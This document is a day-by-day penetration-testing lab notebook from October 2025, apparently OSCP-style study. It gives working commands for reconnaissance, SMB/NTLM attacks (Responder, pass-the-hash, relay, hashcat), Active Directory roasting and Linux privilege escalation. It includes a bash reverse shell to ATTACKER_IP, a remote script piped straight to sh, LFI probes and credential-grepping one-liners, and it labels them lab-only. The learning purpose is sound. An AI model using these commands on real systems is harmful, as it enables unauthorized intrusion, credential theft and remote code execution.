Go Back

October 9 2025 — Environment setup & first reconnaissance

Goal: Verify environment (network/VPN/tools), then run a full-port discovery and initial enumeration on one target to identify priority services (HTTP/SMB/FTP). Store scan outputs and write concise findings.

  1. Network / env check
    // show interfaces and connectivity ip a ping 8.8.8.8
    Purpose: confirm interface, VPN, external connectivity.
  2. Variable target
    export TGT=10.10.10.50
    Purpose: reuse $TGT in all commands to avoid typos.
  3. Full port + version + default NSE
    nmap -sV -sC -p- --min-rate 1000 -oA scans/$TGT-quick $TGT
    Purpose: discover open ports, service banners, and run default scripts quickly.
  4. Quick HTTP header check
    curl -I http://$TGT
    Purpose: server type, proxy, and basic security headers.
  5. Web path brute (find hidden panels/backups)
    gobuster dir -u http://$TGT -w /usr/share/wordlists/common.txt -o gobust/$TGT-web.txt
    Purpose: locate admin pages, backups, .git, .env, etc.
  6. SMB / NetBIOS enumeration
    enum4linux -a $TGT smbclient -L //$TGT -N
    Purpose: enumerate shares, users, groups and potential file exposure.
  7. Preserve evidence
    mkdir -p proofs/$TGT && cp scans/$TGT-quick.* proofs/$TGT/
    Purpose: save outputs for reporting and reproducibility.

October 10 2025 — Repeat scans & deeper enumeration

Goal: Re-run and deepen scans for services discovered on Oct 9. Use service-specific tools and NSE vuln scripts to get more context and possible exploit paths.

October 11 2025 — NSE/script-driven analysis & triage

Goal: Use NSE and focused scripts to gather vulnerability hints; if a shell is obtained, run quick local enumerations (linPEAS or manual checks) to find privesc vectors.

  1. Targeted NSE (vuln & default)
    nmap -sV --script "default or vuln" -p $TGT -oN nmap/$TGT-nse.txt
    Purpose: expose likely exploitable configuration or version-specific issues.
  2. Local automated privesc hinting
    curl -sS https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/linpeas.sh | sh
    Purpose: quickly enumerate SUID, writable paths, cron jobs, and other privesc leads.
  3. Manual privesc probes
    find / -perm -4000 -type f 2>/dev/null | tee /tmp/suid.$TGT.txt crontab -l 2>/dev/null ls -la /etc/cron*
    Purpose: double-check any automated hints and capture candidates for exploitation.

October 12 2025 — Clean-up, triage & TODOs

Goal: Consolidate findings from previous days, extract TODOs, produce a short findings draft and prioritize next steps.

October 13 2025 — HTTP-focused recon & content discovery

Goal: Exhaustively explore web content (headers, hidden endpoints, backups) and perform quick port sweeps. Aim to find any credentials/config files or admin panels that expand attack surface.

  1. Verbose header + redirection check
    curl -I -L http://$TGT curl -v http://$TGT/
    Purpose: gather CSP, X-Frame-Options, Server, redirect chains and cookie details.
  2. Directory brute with extensions
    gobuster dir -u http://$TGT -w /usr/share/wordlists/common.txt -x php,txt,env,bak,old -o gobust/$TGT-web.txt
    Purpose: locate config or backup files (e.g., .env, config.bak) and admin interfaces.
  3. Fast TCP sweep (netcat)
    nc -nvvv -w 1 -z $TGT 1-65535
    Purpose: quick check for connectable TCP ports (useful when nmap is slow or restricted).
  4. Windows-style port sweep (PowerShell)
    # PowerShell (remote/Windows host) $target="10.10.10.10" 1..1024 | ForEach-Object { Test-NetConnection -ComputerName $target -Port $_ -WarningAction SilentlyContinue } | Where-Object { $_.TcpTestSucceeded -eq $true }
    Purpose: run from a Windows host to validate reachable ports and services.
  5. Daily wrap: summary file
    echo "Summary for $TGT" > reports/$TGT-summary.txt grep "open" scans/$TGT-quick.nmap >> reports/$TGT-summary.txt
    Purpose: single-file summary to hand off or to reference on next session.

October 14 2025 — Initial exploitation attempts & post-exploit enumeration

Goal: Based on prior enumeration, attempt low-risk exploitation (credential reuse, simple auth bypass, file inclusion, misconfigured services). If access obtained, perform controlled post-exploit enumeration and preserve evidence.

  1. Attempt credential-based access (web / SMB)
    # If possible creds found (user:pass) curl -u 'user:password' -I http://$TGT/admin smbclient //$TGT/Shared -U user%password
    Purpose: test discovered/reused credentials; low-impact way to validate account access.
  2. Test common web vuln patterns (LFI/RFI/Upload)
    # LFI quick probe curl "http://$TGT/index.php?page=../../../../etc/passwd" -s | head -n 20 # Try simple upload (if upload endpoint exists) curl -F "file=@/etc/passwd" http://$TGT/upload -v
    Purpose: quick, low-noise checks for Local File Inclusion or insecure upload handling.
  3. Exploit known service/version if safe PoC exists
    # Example: use searchsploit locally searchsploit apache 2.4.49 # then review PoC and test in controlled manner
    Purpose: identify public PoCs and only run non-destructive proofs-of-concept (no destructive payloads).
  4. Obtain shell (if possible) — capture carefully
    # Simple reverse shell (testing only in lab) # Attacker: listener nc -lvnp 4444 # Victim: (example) bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
    Purpose: only use in controlled lab; capture TTY using python -c or script; avoid destructive actions.
  5. Post-exploit enumeration (if shell)
    id whoami hostname ps aux --sort=-%mem | head -n 20 ss -tunlp find / -perm -4000 -type f 2>/dev/null | tee /tmp/suid.$TGT.txt ls -la /etc/cron* 2>/dev/null
    Purpose: map privileges, network, running services, and privesc candidates.
  6. Credential harvesting & validation
    # Look for config files, .env, backup files grep -R "DB_PASSWORD\|DB_USER\|PASSWORD\|SECRET" /var/www 2>/dev/null | head -n 40
    Purpose: find stored credentials that may allow lateral movement or privileged access.
  7. Preserve proofs & cleanup
    cp -r /tmp/session_logs proofs/$TGT-$(date +%F) # Do not leave persistent backdoors
    Purpose: save evidence; remove any artifacts you created; do not modify system state beyond necessary.

October 15 2025 — Privilege escalation & lateral movement

Goal: Focus on controlled privilege escalation attempts on a compromised host and, if successful, plan safe lateral movement options (credential reuse, SSH keys, SSH tunnelling, proxying). Always preserve evidence and avoid destructive actions.

  1. Confirm current context
    id whoami hostname uname -a
    Purpose: confirm current user, host and kernel/OS details before escalation attempts.
  2. Sudo capability & permissions
    sudo -l
    Purpose: list allowed sudo commands for the current user — often yields safe escalation paths (no exploit required).
  3. File / capability checks
    getcap -r / 2>/dev/null | grep cap_ find / -perm -4000 -type f 2>/dev/null | tee /tmp/suid.$TGT.txt
    Purpose: find SUID binaries and binaries with capabilities that can be abused for escalation.
  4. Credential/config hunt (read-only)
    grep -R "PASSWORD\|DB_PASS\|DB_USER\|SECRET\|API_KEY" /var/www /etc 2>/dev/null | head -n 60 ls -la ~/.ssh cat ~/.ssh/authorized_keys 2>/dev/null || true
    Purpose: locate stored credentials, keys, or config files that permit privilege escalation or lateral movement. Prefer read-only checks.
  5. Check for SSH keys and reuse
    find / -type f -name "id_rsa" -o -name "id_ecdsa" 2>/dev/null | xargs -r ls -l
    Purpose: identify private keys that could be used for pivoting to other hosts (verify ownership/permission before any use).
  6. Log & service inspection
    journalctl -n 200 --no-pager 2>/dev/null || tail -n 200 /var/log/syslog ps auxf | less
    Purpose: spot recent auth events, scheduled tasks, or suspicious services that hint at escalation vectors or lateral targets.
  7. Network discovery from compromised host
    ip a ss -tunlp arp -a netstat -rn
    Purpose: enumerate reachable networks, listening services, and possible internal targets for lateral movement.
  8. Safe pivoting & tunnelling (if needed)
    # SSH local port forward (attacker side): ssh -L 9000:TARGET_INTERNAL:80 user@COMPROMISED_HOST # Simple SOCKS proxy via SSH ssh -D 1080 user@COMPROMISED_HOST # sshuttle (needs root on attacker & python available on compromised) sshuttle -r user@COMPROMISED_HOST 10.10.0.0/16
    Purpose: create controlled tunnels for accessing internal-only services. Only use authorized lab environments and document commands used.
  9. Credential validation (non-destructive)
    ssh -i /path/to/key -o BatchMode=yes -o StrictHostKeyChecking=no user@internal-host 'echo OK' || echo "no-access"
    Purpose: validate access in a read-only manner; avoid running persistent or interactive payloads during validation.
  10. Post-escalation enumeration & evidence
    sudo -l getent passwd ss -tunlp ps aux --sort=-%mem | head -n 20 find /home -maxdepth 2 -type f -name "*.pem" -o -name "*.key" 2>/dev/null
    Purpose: after escalation, map new capabilities, gather evidence (logs, file listings) and document exact steps/time for reporting.
  11. Cleanup & reporting
    mkdir -p proofs/$TGT-$(date +%F) cp /var/log/auth.log proofs/$TGT-$(date +%F)/ || true echo "Escalation attempts and results:" > proofs/$TGT-$(date +%F)/escalation.txt
    Purpose: preserve artifacts for analysis and reporting. Do not leave tools, shells, or keys on the compromised host.

October 16 2025 — SMB auth & NTLM / hash ideas (detailed commands)

Goal: SMB/NTLM-focused enumeration and authentication techniques (pass-the-hash, NTLMv2 capture/use, CrackMapExec, smbclient, hashcat). Run all offensive techniques only in authorized lab environments. Save outputs to files for evidence.

  1. Start & environment
    # Set variables and prepare folders (consistent recording) export TGT=10.10.10.5 export DATE=$(date +%F) mkdir -p notes/$DATE proofs/$DATE scans # Start log with timestamp echo "Start: $(date --iso-8601=seconds) target=$TGT" | tee proofs/$DATE/session.log
    Purpose: Add timestamps to all outputs and collect results into date-named folders for later reporting.
  2. SMB discovery & quick checks
    # nmap: service/script scan (tune rate to control load) nmap -p 139,445 -sV --script="smb-os-discovery,smb-enum-shares,smb-protocols" --min-rate 500 -oA scans/$TGT-smb $TGT # enum4linux for in-depth SMB/Windows enumeration enum4linux -a $TGT 2>&1 | tee scans/$TGT-enum4linux.txt # quick smbclient listing (anonymous / no-password) smbclient -L //$TGT -N 2>&1 | tee scans/$TGT-smbclient-list.txt
    Purpose: Use nmap + enum4linux to identify OS, shares and permissions; preserve the output files as evidence.
  3. NTLM hash capture ideas (defensive/lab)
    # Responder (LLMNR/NBT-NS/MDNS) - lab only sudo responder -I eth0 -rdw --lm --wredir 2>&1 | tee proofs/$DATE/responder.log # Use a rogue smbserver to lure authentication (lab): check logs/pcap # python3 -m impacket.examples.smbserver SMBShare /path/to/share -smb2support # capture traffic with tcpdump sudo tcpdump -i eth0 -w proofs/$DATE/ntlm_capture.pcap port 445 or port 139
    Purpose: Capture NTLMv2 challenge/response via name resolution weaknesses or a bait share. Do NOT run these on production networks.
  4. Use NTLM hash with smbclient / CrackMapExec
    # smbclient sometimes doesn't accept hash directly; use impacket or CrackMapExec instead # CrackMapExec example (pass-the-hash) crackmapexec smb $TGT -u 'Administrator' -H 'aad3b435b51404ee:0123456789abcdef0123456789abcdef' --shares 2>&1 | tee proofs/$DATE/cme-pth.txt # impacket-smbclient example using -hashes where available python3 /usr/bin/impacket-smbclient 'Administrator@'$TGT -hashes ':0123456789abcdef0123456789abcdef' -no-pass 2>&1 | tee proofs/$DATE/impacket-smbclient.txt
    Purpose: Verify whether captured NTLM hashes authenticate to SMB shares; save both successes and failures for documentation.
  5. Pass-the-hash (PTH) and impacket
    # impacket psexec (hash-based authentication) — lab only # Format: -hashes ':' or ':' if LM not used python3 /usr/bin/impacket-psexec 'DOMAIN/Administrator@'$TGT -hashes ':0123456789abcdef0123456789abcdef' 2>&1 | tee proofs/$DATE/psexec-pth.txt # wmiexec as a non-interactive shell alternative python3 /usr/bin/impacket-wmiexec 'Administrator@'$TGT -hashes ':0123456789abcdef0123456789abcdef' 2>&1 | tee proofs/$DATE/wmiexec-pth.txt
    Purpose: Attempt remote command execution using hashes. Note that UAC, firewalls, or EDR may block these attempts—record the results.
  6. Crack NTLM / AS-REP / Kerberoast hashes
    # Example hashcat usage: NTLM = -m 1000 hashcat -m 1000 proofs/$DATE/ntlm_hashes.txt /usr/share/wordlists/rockyou.txt --outfile-format=2 --outfile=proofs/$DATE/cracked_ntlm.txt --runtime=3600 # AS-REP (no preauth) example: -m 18200 hashcat -m 18200 proofs/$DATE/asrep_hashes.txt /usr/share/wordlists/rockyou.txt --outfile=proofs/$DATE/cracked_asrep.txt # Kerberoast TGS example: -m 13100 hashcat -m 13100 proofs/$DATE/kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt --outfile=proofs/$DATE/cracked_kerberoast.txt
    Purpose: Use dictionary/rule-based cracking to recover plaintext credentials from captured hashes. Track time/resource limits and preserve results.
  7. Test weak creds & default accounts (safety)
    # Test small credential lists (check lockout policy before running) crackmapexec smb $TGT -u small_userlist.txt -p small_passlist.txt --continue-on-success --shares 2>&1 | tee proofs/$DATE/spray_attempts.txt # RDP/WinRM test if the service is open crackmapexec rdp $TGT -u Administrator -p 'P@ssw0rd' 2>&1 | tee proofs/$DATE/rdp_test.txt
    Purpose: Look for reused or default credentials while avoiding large-scale password spraying that could trigger account lockouts—keep tests minimal and controlled.
  8. Responder / NTLM relay considerations (defensive learning)
    # ntlmrelayx.py example (lab only): relay to LDAP/DC sudo ntlmrelayx.py -tf targets.txt -smb2support -t ldap://10.10.10.10 --debug 2>&1 | tee proofs/$DATE/ntlmrelayx.log # Successful relays can allow privilege escalation in domain environments — do NOT run against production
    Purpose: Learn the risks of NTLM relay and test mitigations. Relaying on a production network is strictly prohibited and illegal in many contexts.
  9. Enumerate shares & download proofs
    # smbclient for file listing and read-only download smbclient //${TGT}/Public -U 'guest%' -c 'ls' 2>&1 | tee proofs/$DATE/smbclient-list-public.txt # smbmap to enumerate and simulate recursive reads smbmap -H $TGT -u 'guest' -p '' -R 2>&1 | tee proofs/$DATE/smbmap-recursive.txt # If allowed to collect a file, download and move it to proofs smbclient //${TGT}/Public -U 'guest%' -c 'get important.log' && mv important.log proofs/$DATE/ || true
    Purpose: Only collect files you are authorized to read. Store sensitive artifacts in an isolated proofs directory and avoid modifying target files.
  10. Document findings & next steps
    # Create a Markdown summary for reporting cat > notes/$DATE/summary.md <
    Purpose: Produce a concise report + a compressed archive with a checksum to preserve integrity. Review sensitive content before sharing.

October 17 2025 — Webapp enumeration & vuln checking

Goal: Enumerate web apps (content discovery, params, tech stack), discover injection points and common misconfigurations, and capture outputs for reporting. Use passive & non-destructive checks first; active exploitation only in lab.

  1. Prepare environment
    export TGT=web.target.local DATE=$(date +%F) mkdir -p scans/$DATE proofs/$DATE notes/$DATE echo "Oct17 start: $(date --iso-8601=seconds) target=$TGT" | tee proofs/$DATE/session.log
    Purpose: create date-stamped folders and a session log to collect evidence.
  2. Passive fingerprinting
    # WhatWeb / Wappalyzer whatweb -a 3 https://$TGT 2>&1 | tee scans/$DATE/whatweb.txt # curl headers curl -I -sS https://$TGT | tee scans/$DATE/curl-headers.txt
    Purpose: determine web server, frameworks, WAF presence without intrusive scans.
  3. Directory & content discovery
    # gobuster or dirb gobuster dir -u https://$TGT -w /usr/share/wordlists/dirb/common.txt -t 50 -o scans/$DATE/gobuster.txt # fallback: dirb dirb https://$TGT /usr/share/wordlists/dirb/common.txt -o scans/$DATE/dirb.txt
    Purpose: find hidden endpoints and admin panels; save results for targeted testing.
  4. Parameter discovery & fuzzing
    # wfuzz example (quick GET parameter fuzz) wfuzz -c -z file,/usr/share/wordlists/raft-small-params.txt -u https://$TGT/FUZZ -o scans/$DATE/wfuzz.txt # Burp Intruder is recommended for manual follow-up
    Purpose: identify possible injection points and parameters for further analysis.
  5. Common vuln scans (safe)
    # Nikto for safe info nikto -h https://$TGT -output scans/$DATE/nikto.txt # optional: nikto findings -> manual verify
    Purpose: high-level vuln checks; treat findings as leads, not confirmed exploits.
  6. SQLi & injection checks (non-destructive)
    # sqlmap discovery (safe mode: --batch -p param --risk=1 --level=1) sqlmap -u "https://$TGT/page.php?id=1" -p id --batch --risk=1 --level=1 --answers="quit=Y" -o scans/$DATE/sqlmap.txt
    Purpose: run low-impact checks to detect injectable parameters; avoid high-risk options on production.
  7. Auth & session testing
    # Check session cookie flags python3 - <<'PY' | tee scans/$DATE/cookies_check.txt import requests r = requests.get('https://$TGT') print(r.headers.get('Set-Cookie')) PY # Manual Burp inspection recommended
    Purpose: find insecure cookies (missing HttpOnly/Secure/SameSite) that enable session hijack.
  8. File upload & path traversal checks (lab)
    # Simple traversal probe curl -sS "https://$TGT/download?file=../../../../etc/passwd" -o scans/$DATE/traversal.txt || true # If file upload exists, attempt harmless filename checks (lab only)
    Purpose: quickly test for trivial misconfigurations; do not attempt remote code execution on production.
  9. Capture & archive evidence
    cp scans/$DATE/* proofs/$DATE/ || true tar -czf proofs/$DATE-web-proofs.tar.gz proofs/$DATE scans/$DATE notes/$DATE sha256sum proofs/$DATE-web-proofs.tar.gz | tee proofs/$DATE/checksum.sha256
    Purpose: package artifacts and create checksum for integrity before reporting.
  10. Report findings & next steps
    cat > notes/$DATE/summary.md <
    Purpose: produce concise summary and recommended manual follow-ups (Burp, manual review).
Tips:

October 18 2025 — Linux post-exploit: privilege escalation deep dive

Goal: After initial foothold on a Linux host, perform safe enumeration for escalation (SUID, capabilities, credentials, cron, kernel info). Prefer read-only checks and document every step.

  1. Environment & evidence folders
    export TGT=10.10.10.12 DATE=$(date +%F) mkdir -p notes/$DATE proofs/$DATE scans echo "Oct18 start: $(date --iso-8601=seconds) target=$TGT" | tee proofs/$DATE/session.log
    Purpose: keep host-specific logs and proofs in a single date folder.
  2. Basic system info
    id | tee proofs/$DATE/id.txt uname -a | tee proofs/$DATE/uname.txt cat /etc/os-release 2>/dev/null | tee proofs/$DATE/os-release.txt
    Purpose: capture kernel/version/os details to check for known kernel exploits.
  3. SUID binaries, file capabilities
    getcap -r / 2>/dev/null | tee proofs/$DATE/getcap.txt find / -perm -4000 -type f -exec ls -ld {} \; 2>/dev/null | tee proofs/$DATE/suid.txt
    Purpose: locate privileged binaries that may be abused for escalation; note exact paths/owners.
  4. Installed packages & services
    # Debian/Ubuntu dpkg -l 2>/dev/null | tee proofs/$DATE/dpkg-list.txt # RHEL/CentOS rpm -qa 2>/dev/null | tee proofs/$DATE/rpm-list.txt # list services systemctl list-units --type=service --no-pager 2>/dev/null | tee proofs/$DATE/services.txt
    Purpose: identify outdated packages or services running as root that can be targeted or misconfigured.
  5. Readable credential files & configs (read-only)
    grep -R --line-number -I "password\|passwd\|secret\|api_key\|db_pass" /etc /var/www /home 2>/dev/null | tee proofs/$DATE/cred-grep.txt || true ls -la /root /home 2>/dev/null | tee proofs/$DATE/dirs.txt
    Purpose: search for misstored credentials. Only inspect files you are allowed to read; avoid exfiltrating secrets unnecessarily.
  6. Cron jobs, systemd timers
    crontab -l 2>/dev/null | tee proofs/$DATE/crontab-user.txt ls -la /etc/cron.* /etc/systemd/system | tee proofs/$DATE/cron-system.txt systemctl list-timers --all 2>/dev/null | tee proofs/$DATE/timers.txt
    Purpose: find scheduled tasks running as root or with writable scripts that can be abused for escalation.
  7. Kernel exploit check (safe)
    # Check kernel version & search local exploit DB (offline) uname -r | tee proofs/$DATE/kernel.txt # Use searchsploit locally (no exploit execution) searchsploit --nmap scans/$DATE/$TGT-some-scan.nmap $(cat proofs/$DATE/kernel.txt) 2>&1 | tee proofs/$DATE/searchsploit.txt || true
    Purpose: identify known kernel CVEs but do NOT run public PoCs on production—use lab only after risk assessment.
  8. Privilege escalation helpers (linpeas, lesu)
    # Download linpeas (lab) and run read-only checks curl -sS https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh -o /tmp/linpeas.sh && chmod +x /tmp/linpeas.sh /tmp/linpeas.sh 2>&1 | tee proofs/$DATE/linpeas.txt
    Purpose: use linpeas output as an aggregation of potential vectors; always inspect findings manually.
  9. Check kernel modules & loaded drivers
    lsmod 2>/dev/null | tee proofs/$DATE/lsmod.txt dmesg | tail -n 200 2>/dev/null | tee proofs/$DATE/dmesg-tail.txt
    Purpose: detect suspicious modules or drivers that might indicate prior compromise or exploitable interfaces.
  10. Save artifacts & clean temp files
    tar -czf proofs/$DATE-linux-proofs.tar.gz proofs/$DATE scans/$DATE notes/$DATE sha256sum proofs/$DATE-linux-proofs.tar.gz | tee proofs/$DATE/checksum.sha256 # remove large temp if created rm -f /tmp/linpeas.sh || true
    Purpose: compress & hash evidence; remove temporary artifacts created during enumeration.

October 20 2025 — Active Directory & domain-level techniques

Goal: Domain enumeration + common AD attack/defense (Kerberoast, AS-REP, BloodHound, signing, replication). Offensive domain ops only with explicit written permission.

  1. Setup & environment
    export DOMAIN=EXAMPLE.LOCAL export TGT_DC=10.10.30.1 DATE=$(date +%F) mkdir -p proofs/$DATE scans/$DATE notes/$DATE echo "Oct20 start: $(date --iso-8601=seconds) domain=$DOMAIN dc=$TGT_DC" | tee proofs/$DATE/session.log
    Purpose: domain-scoped session + session log.
  2. AD enumeration (LDAP/SMB)
    ldapsearch -x -h $TGT_DC -b "dc=example,dc=local" "(objectClass=user)" cn sAMAccountName | tee scans/$DATE/ldap_users.txt rpcclient -U "" $TGT_DC -c "enumdomusers" 2>&1 | tee scans/$DATE/rpc_users.txt
    Purpose: collect user/group lists for analysis.
  3. Kerberoasting (lab)
    # Rubeus.exe kerberoast /outfile:proofs/$DATE/kerberoast_tickets.txt # Crack with hashcat -m 13100
    Purpose: gather TGS for offline cracking (lab only).
  4. AS-REP roasting checks
    powershell -c "Import-Module PowerView; Get-DomainUser -PreAuthNotRequired | Out-File C:\\Temp\\asrep_users.txt" # Crack with hashcat -m 18200
    Purpose: identify preauth-disabled users for offline cracking.
  5. BloodHound collection (safely)
    SharpHound.exe -c All -d $DOMAIN -oC .\\bloodhound-output
    Purpose: map AD relationships/paths; limit on prod.
  6. DCSync / replication detection (defensive)
    powershell -c "Get-ADObject -LDAPFilter '(objectClass=msDS-Replication-Task)' | Out-File C:\\Temp\\replication.txt" # example # Monitor DC logs for unusual DRSUAPI
    Purpose: find accounts with replication rights; watch for DCSync IOCs.
  7. LDAP & SMB signing
    ldapsearch -x -h $TGT_DC -b "dc=example,dc=local" 2>&1 | tee scans/$DATE/ldap_test.txt crackmapexec smb $TGT_DC -u '' -p '' --signing 2>&1 | tee scans/$DATE/smb_signing.txt
    Purpose: weak/no signing ⇒ relay/mitm risk.
  8. Credential hygiene
    powershell -c "Import-Module ActiveDirectory; Get-ADUser -Filter * -Properties LastLogonDate,PasswordLastSet | Select Name,LastLogonDate,PasswordLastSet | Out-File C:\\Temp\\ad_password_info.txt"
    Purpose: find stale/never-rotated accounts.
  9. Package outputs & summary
    tar -czf proofs/$DATE-ad-proofs.tar.gz proofs/$DATE scans/$DATE notes/$DATE sha256sum proofs/$DATE-ad-proofs.tar.gz | tee proofs/$DATE/checksum.sha256 cat > notes/$DATE/summary.md <
    Purpose: artifact bundle + executive summary.
  10. Mitigation recommendations
    cat >> notes/$DATE/summary.md <
    Purpose: actionable next steps for defenders.

October 21 2025 — SMB & FTP deep enumeration

Goal: Enumerate SMB & FTP in parallel, collect share/file evidence, and grep for credential artifacts.

  1. Setup & environment
    export TGT=10.0.2.15 DATE=$(date +%F) mkdir -p ~/oscp/proofs/$DATE/{nmap,enum4linux,smb,ftp,downloads,findings} notes=~/oscp/notes/$DATE-smbftp.md ip a ping -c 3 $TGT
    Purpose: session folders & connectivity check.
  2. Targeted port scan (SMB/FTP)
    nmap -sS -p21,137-139,445 -sV --reason --open -oA ~/oscp/proofs/$DATE/nmap/$TGT-smbftp $TGT cp ~/oscp/proofs/$DATE/nmap/$TGT-smbftp.nmap ~/oscp/proofs/$DATE/nmap/$TGT-smbftp-raw.nmap
    Purpose: confirm FTP(21) and SMB(139/445) exposure & versions.
  3. SMB enumeration
    enum4linux -a $TGT | tee ~/oscp/proofs/$DATE/enum4linux/$TGT-enum4linux.txt smbclient -L //$TGT -N | tee ~/oscp/proofs/$DATE/smb/${TGT}-shares.txt smbclient //${TGT}/public -N -c 'ls' | tee ~/oscp/proofs/$DATE/smb/${TGT}-public-ls.txt # if creds are available (from prior findings) # smbclient //${TGT}/private -U alice%Summer2025! -c 'ls' | tee ~/oscp/proofs/$DATE/smb/${TGT}-private-ls.txt
    Purpose: list shares, access level, and interesting files.
    # (lab only) pull likely-sensitive files smbclient //${TGT}/public -N -c 'prompt; mget config*.bak *.sql *.env *.txt' # move to proofs if downloaded to CWD mkdir -p ~/oscp/proofs/$DATE/downloads mv config*.bak *.sql *.env *.txt ~/oscp/proofs/$DATE/downloads/ 2>/dev/null || true
    Purpose: preserve originals under proofs/$DATE/downloads (do not modify).
  4. FTP enumeration
    nmap --script ftp-anon -p21 -oN ~/oscp/proofs/$DATE/nmap/$TGT-ftp-anon.txt $TGT # manual session (anonymous if allowed) ftp $TGT # <inside ftp> user: anonymous pass: you@youremail # ls ; get readme.txt ; quit # quick list with curl (if directory listing is enabled) curl -v ftp://$TGT/ 2>&1 | tee ~/oscp/proofs/$DATE/ftp/${TGT}-curl-list.txt
    Purpose: confirm anonymous read/upload. If upload allowed, stop and document (no uploads in shared labs).
  5. Keyword scan on collected files
    grep -iR --line-number -E "pass(word)?|passwd|secret|api[_-]?key|token|access_key|aws_secret" \ ~/oscp/proofs/$DATE/downloads || true | tee ~/oscp/proofs/$DATE/findings/${TGT}-possible-creds.txt
    Purpose: normalize potential credential hits into one findings file.
  6. Document & evidence wrap-up
    cat > ~/oscp/proofs/$DATE/summary.txt <<EOF Date: $DATE Target: $TGT Scans: proofs/$DATE/nmap/ SMB: proofs/$DATE/smb/ FTP: proofs/$DATE/ftp/ Downloads: proofs/$DATE/downloads/ Findings: proofs/$DATE/findings/${TGT}-possible-creds.txt EOF history | tail -n 120 > ~/oscp/proofs/$DATE/commands_history.txt
    Purpose: evidence index & reproducibility trail.

October 22 2025 — Credential reuse & initial shell recon

Goal: Test candidate creds from 10/21 against SMB/FTP/SSH; if shell obtained, capture controlled local enumeration.

  1. Prepare candidate credential list
    mkdir -p ~/oscp/proofs/$DATE/{host} cat > ~/oscp/proofs/$DATE/findings/creds_candidates.txt <<'EOF' smb|alice|Summer2025!|config.bak|/public/config.bak ftp|backup|backup123|backup.sql|/ftp/backup.sql EOF
    Purpose: machine-readable list (service|user|pass|source_file|source_path). Never publish plaintext creds.
  2. SMB/FTP reuse tests
    while IFS='|' read service user pass srcfile srcpath; do if [ "$service" = "smb" ]; then smbclient //${TGT}/private -U "${user}%${pass}" -c 'ls' 2>&1 | tee ~/oscp/proofs/$DATE/smb/${user}-reuse.txt fi done < ~/oscp/proofs/$DATE/findings/creds_candidates.txt # FTP (non-interactive) ftp -n $TGT <<ENDOFTPCMD 2>&1 | tee ~/oscp/proofs/$DATE/ftp/ftp-backup-reuse.txt user backup backup123 ls quit ENDOFTPCMD
    Purpose: verify reuse; store outputs as proof (success/failure).
  3. SSH attempt (if applicable)
    ssh -o ConnectTimeout=8 alice@$TGT # or key-based # ssh -i ~/oscp/proofs/$DATE/downloads/id_rsa.pem alice@$TGT
    Purpose: obtain interactive shell respecting lockout policies.
  4. On-shell: safe baseline recon
    whoami | tee ~/oscp/proofs/$DATE/host/whoami.txt id | tee ~/oscp/proofs/$DATE/host/id.txt hostname | tee ~/oscp/proofs/$DATE/host/hostname.txt uname -a | tee ~/oscp/proofs/$DATE/host/uname.txt cat /etc/os-release | tee ~/oscp/proofs/$DATE/host/os-release.txt sudo -l 2>&1 | tee ~/oscp/proofs/$DATE/host/sudo-l.txt ps aux --sort=-%mem | head -n 40 > ~/oscp/proofs/$DATE/host/ps-top.txt ss -tunlp > ~/oscp/proofs/$DATE/host/ss-listening.txt
    Purpose: non-destructive privilege, process, and network snapshot.
  5. Search for local credential artifacts
    grep -I -R --line-number -E "password|passwd|api[_-]?key|token|aws_access|secret" \ /var/www /home 2>/dev/null | tee ~/oscp/proofs/$DATE/host/possible-creds.txt find / -perm -4000 -type f 2>/dev/null | tee ~/oscp/proofs/$DATE/host/suid-list.txt
    Purpose: collect next-step privesc candidates (do not exploit).
  6. Automated helper (lab-only)
    wget -qO /tmp/linpeas.sh https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/linpeas.sh chmod +x /tmp/linpeas.sh /tmp/linpeas.sh | tee ~/oscp/proofs/$DATE/host/linpeas-output.txt
    Purpose: broaden local discovery (store full output, extract highlights into notes).

October 23 2025 — Local PrivEsc recon & triage

Goal: Identify and prioritize privesc vectors (SUID, writable service files, cron, systemd, libraries) and draft safe PoC ideas.

  1. Baseline facts
    whoami | tee ~/oscp/proofs/$DATE/host/whoami.txt id | tee ~/oscp/proofs/$DATE/host/id.txt uname -a | tee ~/oscp/proofs/$DATE/host/uname.txt cat /etc/os-release | tee ~/oscp/proofs/$DATE/host/os-release.txt
    Purpose: kernel/distro details for CVE mapping.
  2. SUID enumeration
    find / -perm -4000 -type f 2>/dev/null | tee ~/oscp/proofs/$DATE/host/suid-list.txt # inspect a candidate ls -l /usr/bin/find 2>/dev/null || true strings /usr/bin/find | head -n 80
    Purpose: review common abusable SUIDs (find, nmap, perl, python, less, vim).
  3. Writable service files & cron
    find / -type f -writable -not -path "/proc/*" 2>/dev/null | head -n 200 \ | tee ~/oscp/proofs/$DATE/host/writable-head.txt cat /etc/crontab 2>/dev/null | tee ~/oscp/proofs/$DATE/host/etc-crontab.txt ls -la /etc/cron.d/ 2>/dev/null | tee ~/oscp/proofs/$DATE/host/cron.d-list.txt ls -la /etc/systemd/system | tee ~/oscp/proofs/$DATE/host/systemd-list.txt grep -R "ExecStart" /etc/systemd/system -n 2>/dev/null | tee ~/oscp/proofs/$DATE/host/systemd-execstart.txt
    Purpose: writable cron scripts or unit files = P1 candidates. Capture full path & perms with ls -l.
  4. Library / LD_PRELOAD checks
    ldd /usr/bin/some-binary 2>/dev/null | tee ~/oscp/proofs/$DATE/host/ldd-some-binary.txt grep -R "LD_PRELOAD" /etc /usr /home 2>/dev/null | tee ~/oscp/proofs/$DATE/host/ldpreload-check.txt
    Purpose: detect writable library paths or preload hooks.
  5. PoC template & triage
    cat > ~/oscp/proofs/$DATE/host/poc-template.txt <<'EOF' [Vector] <writable cron / vulnerable SUID / unit file> [Evidence] paste ls -l, file snippet, and path [Abuse idea] safe PoC in /tmp (non-destructive) to validate execution/write control [Risk] PrivEsc -> root [Defense] fix perms; chown root:root; remove unnecessary SUID; harden cron dirs EOF
    Purpose: standardize documentation and prioritize (P1/P2/P3).
  6. 6-line summary & archive
    mkdir -p ~/oscp/proofs/$DATE/notes cat > ~/oscp/proofs/$DATE/notes/summary-6line.txt <<EOF Context: low-priv shell on $TGT Key findings: writable cron/script, SUID candidate(s) Exploitability: P1 for writable cron (needs PoC) Next steps: craft safe PoC in /tmp; capture outputs Defense: remove write perms; restrict cron dir; drop SUID EOF tar -czf ~/oscp/proofs/$DATE-${TGT}-archive.tgz -C ~/oscp/proofs/$DATE .
